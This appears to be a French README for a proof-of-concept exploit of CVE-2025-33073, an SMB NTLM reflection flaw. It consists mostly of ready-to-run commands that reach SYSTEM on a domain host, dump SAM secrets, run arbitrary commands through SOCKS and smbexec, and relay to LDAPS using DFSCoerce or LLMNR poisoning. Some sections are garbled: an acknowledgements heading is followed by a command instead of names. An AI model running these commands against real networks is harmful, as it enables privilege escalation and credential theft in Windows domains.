
Exploit PoC pour la faille de réflexion NTLM SMB.
Exploit PoC pour la faille de réflexion NTLM SMB.
Tout le crédit va à la recherche officielle :
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS : Kali Linux (la plupart des paquets sont préinstallés).
L'outil utilisera automatiquement un environnement virtuel. Pour le configurer, exécutez :
./setup.sh
Cela créera un environnement virtuel et installera toutes les dépendances requises, y compris ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Commande personnalisée
Au lieu d'exécuter secretsdump, une commande personnalisée peut être exécutée.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
Pour une exécution plus discrète des commandes après qu'une connexion valide en tant que SYSTEM a été établie. --target et --target-ip doivent être identiques ici.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
Une commande personnalisée peut également être exécutée via proxychains au lieu de vider le SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Des recherches ont été menées pour voir si la réflexion ne fonctionnait vraiment pas avec la signature SMB activée, ce qui a conduit à trouver des bugs où, si SIGN/SEAL sont supprimés du paquet, il est possible de relayer de SMB vers LDAPS, ce qui n'est généralement pas possible à cause de MIC.
Remerciements à :
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
Si vous êtes dans le même domaine de diffusion que l'appareil et qu'il est vulnérable à l'empoisonnement LLMNR, il est possible d'exploiter un appareil sans avoir à enregistrer un enregistrement DNS.

L'authentification NTLM locale a lieu

L'authentification NTLM locale n'a pas lieu, ce qui entraîne une tentative ÉCHOUÉE

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073